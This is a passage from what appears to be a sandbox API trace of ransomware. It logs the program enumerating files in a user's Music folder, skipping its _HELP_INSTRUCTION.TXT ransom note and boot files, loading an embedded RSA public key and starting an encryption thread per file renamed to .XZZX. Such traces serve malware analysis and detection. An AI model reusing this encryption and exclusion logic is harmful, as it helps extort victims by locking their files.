lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x510 [0115.743] Sleep (dwMilliseconds=0x96) [0115.898] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0115.898] lstrcmpW (lpString1="54E892FC383D1FA0EE2D03953C6A03E8.XZZX", lpString2="..") returned 1 [0115.898] lstrcmpW (lpString1="54E892FC383D1FA0EE2D03953C6A03E8.XZZX", lpString2=".") returned 1 [0115.898] StrStrW (lpFirst="54E892FC383D1FA0EE2D03953C6A03E8.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0115.898] StrStrW (lpFirst="54E892FC383D1FA0EE2D03953C6A03E8.XZZX", lpSrch="ntldr") returned 0x0 [0115.898] StrStrW (lpFirst="54E892FC383D1FA0EE2D03953C6A03E8.XZZX", lpSrch="NTLDR") returned 0x0 [0115.898] StrStrW (lpFirst="54E892FC383D1FA0EE2D03953C6A03E8.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0115.898] StrStrW (lpFirst="54E892FC383D1FA0EE2D03953C6A03E8.XZZX", lpSrch="ntdetect.com") returned 0x0 [0115.898] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="Desktop") returned 0x0 [0115.898] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="DESKTOP") returned 0x0 [0115.898] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned 59 [0115.899] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0115.899] lstrcpyW (in: lpString1=0x17be7c, lpString2="54E892FC383D1FA0EE2D03953C6A03E8.XZZX" | out: lpString1="54E892FC383D1FA0EE2D03953C6A03E8.XZZX") returned="54E892FC383D1FA0EE2D03953C6A03E8.XZZX" [0115.899] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0115.899] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x514 [0115.899] Sleep (dwMilliseconds=0x96) [0116.054] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0116.054] lstrcmpW (lpString1="6D35692C49D86B1ADE80FADA4DF04F62.XZZX", lpString2="..") returned 1 [0116.054] lstrcmpW (lpString1="6D35692C49D86B1ADE80FADA4DF04F62.XZZX", lpString2=".") returned 1 [0116.054] StrStrW (lpFirst="6D35692C49D86B1ADE80FADA4DF04F62.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0116.054] StrStrW (lpFirst="6D35692C49D86B1ADE80FADA4DF04F62.XZZX", lpSrch="ntldr") returned 0x0 [0116.054] StrStrW (lpFirst="6D35692C49D86B1ADE80FADA4DF04F62.XZZX", lpSrch="NTLDR") returned 0x0 [0116.054] StrStrW (lpFirst="6D35692C49D86B1ADE80FADA4DF04F62.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0116.054] StrStrW (lpFirst="6D35692C49D86B1ADE80FADA4DF04F62.XZZX", lpSrch="ntdetect.com") returned 0x0 [0116.054] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="Desktop") returned 0x0 [0116.054] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="DESKTOP") returned 0x0 [0116.054] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned 59 [0116.054] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0116.054] lstrcpyW (in: lpString1=0x17be7c, lpString2="6D35692C49D86B1ADE80FADA4DF04F62.XZZX" | out: lpString1="6D35692C49D86B1ADE80FADA4DF04F62.XZZX") returned="6D35692C49D86B1ADE80FADA4DF04F62.XZZX" [0116.054] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0116.054] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x518 [0116.055] Sleep (dwMilliseconds=0x96) [0116.211] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0116.211] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0116.211] lstrcmpW (lpString1="A191878831212978B3B60CE1354E0DC0.XZZX", lpString2="..") returned 1 [0116.211] lstrcmpW (lpString1="A191878831212978B3B60CE1354E0DC0.XZZX", lpString2=".") returned 1 [0116.211] StrStrW (lpFirst="A191878831212978B3B60CE1354E0DC0.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0116.211] StrStrW (lpFirst="A191878831212978B3B60CE1354E0DC0.XZZX", lpSrch="ntldr") returned 0x0 [0116.211] StrStrW (lpFirst="A191878831212978B3B60CE1354E0DC0.XZZX", lpSrch="NTLDR") returned 0x0 [0116.211] StrStrW (lpFirst="A191878831212978B3B60CE1354E0DC0.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0116.211] StrStrW (lpFirst="A191878831212978B3B60CE1354E0DC0.XZZX", lpSrch="ntdetect.com") returned 0x0 [0116.211] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="Desktop") returned 0x0 [0116.211] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="DESKTOP") returned 0x0 [0116.211] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned 59 [0116.211] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0116.211] lstrcpyW (in: lpString1=0x17be7c, lpString2="A191878831212978B3B60CE1354E0DC0.XZZX" | out: lpString1="A191878831212978B3B60CE1354E0DC0.XZZX") returned="A191878831212978B3B60CE1354E0DC0.XZZX" [0116.211] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0116.211] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x51c [0116.212] Sleep (dwMilliseconds=0x96) [0116.366] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0116.366] lstrcmpW (lpString1="B5A4F8D81D2BC280A6FB77022143A6C8.XZZX", lpString2="..") returned 1 [0116.366] lstrcmpW (lpString1="B5A4F8D81D2BC280A6FB77022143A6C8.XZZX", lpString2=".") returned 1 [0116.366] StrStrW (lpFirst="B5A4F8D81D2BC280A6FB77022143A6C8.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0116.366] StrStrW (lpFirst="B5A4F8D81D2BC280A6FB77022143A6C8.XZZX", lpSrch="ntldr") returned 0x0 [0116.366] StrStrW (lpFirst="B5A4F8D81D2BC280A6FB77022143A6C8.XZZX", lpSrch="NTLDR") returned 0x0 [0116.366] StrStrW (lpFirst="B5A4F8D81D2BC280A6FB77022143A6C8.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0116.366] StrStrW (lpFirst="B5A4F8D81D2BC280A6FB77022143A6C8.XZZX", lpSrch="ntdetect.com") returned 0x0 [0116.366] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="Desktop") returned 0x0 [0116.366] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="DESKTOP") returned 0x0 [0116.366] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned 59 [0116.366] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0116.366] lstrcpyW (in: lpString1=0x17be7c, lpString2="B5A4F8D81D2BC280A6FB77022143A6C8.XZZX" | out: lpString1="B5A4F8D81D2BC280A6FB77022143A6C8.XZZX") returned="B5A4F8D81D2BC280A6FB77022143A6C8.XZZX" [0116.366] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0116.366] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x520 [0116.367] Sleep (dwMilliseconds=0x96) [0116.522] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0116.522] lstrcmpW (lpString1="C8E8BDDC263509ECACA7C0D62A50EE34.XZZX", lpString2="..") returned 1 [0116.522] lstrcmpW (lpString1="C8E8BDDC263509ECACA7C0D62A50EE34.XZZX", lpString2=".") returned 1 [0116.522] StrStrW (lpFirst="C8E8BDDC263509ECACA7C0D62A50EE34.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0116.522] StrStrW (lpFirst="C8E8BDDC263509ECACA7C0D62A50EE34.XZZX", lpSrch="ntldr") returned 0x0 [0116.522] StrStrW (lpFirst="C8E8BDDC263509ECACA7C0D62A50EE34.XZZX", lpSrch="NTLDR") returned 0x0 [0116.522] StrStrW (lpFirst="C8E8BDDC263509ECACA7C0D62A50EE34.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0116.522] StrStrW (lpFirst="C8E8BDDC263509ECACA7C0D62A50EE34.XZZX", lpSrch="ntdetect.com") returned 0x0 [0116.522] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="Desktop") returned 0x0 [0116.522] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="DESKTOP") returned 0x0 [0116.522] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned 59 [0116.522] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0116.522] lstrcpyW (in: lpString1=0x17be7c, lpString2="C8E8BDDC263509ECACA7C0D62A50EE34.XZZX" | out: lpString1="C8E8BDDC263509ECACA7C0D62A50EE34.XZZX") returned="C8E8BDDC263509ECACA7C0D62A50EE34.XZZX" [0116.522] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0116.522] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x524 [0116.522] Sleep (dwMilliseconds=0x96) [0116.680] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0116.680] lstrcmpW (lpString1="E003588E3DA0B59DC1493EC641B899E5.XZZX", lpString2="..") returned 1 [0116.680] lstrcmpW (lpString1="E003588E3DA0B59DC1493EC641B899E5.XZZX", lpString2=".") returned 1 [0116.680] StrStrW (lpFirst="E003588E3DA0B59DC1493EC641B899E5.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0116.680] StrStrW (lpFirst="E003588E3DA0B59DC1493EC641B899E5.XZZX", lpSrch="ntldr") returned 0x0 [0116.680] StrStrW (lpFirst="E003588E3DA0B59DC1493EC641B899E5.XZZX", lpSrch="NTLDR") returned 0x0 [0116.680] StrStrW (lpFirst="E003588E3DA0B59DC1493EC641B899E5.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0116.680] StrStrW (lpFirst="E003588E3DA0B59DC1493EC641B899E5.XZZX", lpSrch="ntdetect.com") returned 0x0 [0116.680] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="Desktop") returned 0x0 [0116.680] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="DESKTOP") returned 0x0 [0116.680] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned 59 [0116.680] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0116.680] lstrcpyW (in: lpString1=0x17be7c, lpString2="E003588E3DA0B59DC1493EC641B899E5.XZZX" | out: lpString1="E003588E3DA0B59DC1493EC641B899E5.XZZX") returned="E003588E3DA0B59DC1493EC641B899E5.XZZX" [0116.680] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0116.680] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x528 [0116.681] Sleep (dwMilliseconds=0x96) [0116.834] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0116.834] lstrcmpW (lpString1="EED603F80D860CC870D6498A119DF110.XZZX", lpString2="..") returned 1 [0116.834] lstrcmpW (lpString1="EED603F80D860CC870D6498A119DF110.XZZX", lpString2=".") returned 1 [0116.834] StrStrW (lpFirst="EED603F80D860CC870D6498A119DF110.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0116.834] StrStrW (lpFirst="EED603F80D860CC870D6498A119DF110.XZZX", lpSrch="ntldr") returned 0x0 [0116.834] StrStrW (lpFirst="EED603F80D860CC870D6498A119DF110.XZZX", lpSrch="NTLDR") returned 0x0 [0116.834] StrStrW (lpFirst="EED603F80D860CC870D6498A119DF110.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0116.834] StrStrW (lpFirst="EED603F80D860CC870D6498A119DF110.XZZX", lpSrch="ntdetect.com") returned 0x0 [0116.834] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="Desktop") returned 0x0 [0116.834] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="DESKTOP") returned 0x0 [0116.834] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned 59 [0116.834] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0116.834] lstrcpyW (in: lpString1=0x17be7c, lpString2="EED603F80D860CC870D6498A119DF110.XZZX" | out: lpString1="EED603F80D860CC870D6498A119DF110.XZZX") returned="EED603F80D860CC870D6498A119DF110.XZZX" [0116.834] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0116.834] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x52c [0116.835] Sleep (dwMilliseconds=0x96) [0116.990] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0116.990] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0116.990] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0116.990] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0116.990] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0116.990] FindClose (in: hFindFile=0x3a5590 | out: hFindFile=0x3a5590) returned 1 [0116.990] FindClose (in: hFindFile=0x3a5590 | out: hFindFile=0x3a5590) returned 0 [0116.990] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze" | out: 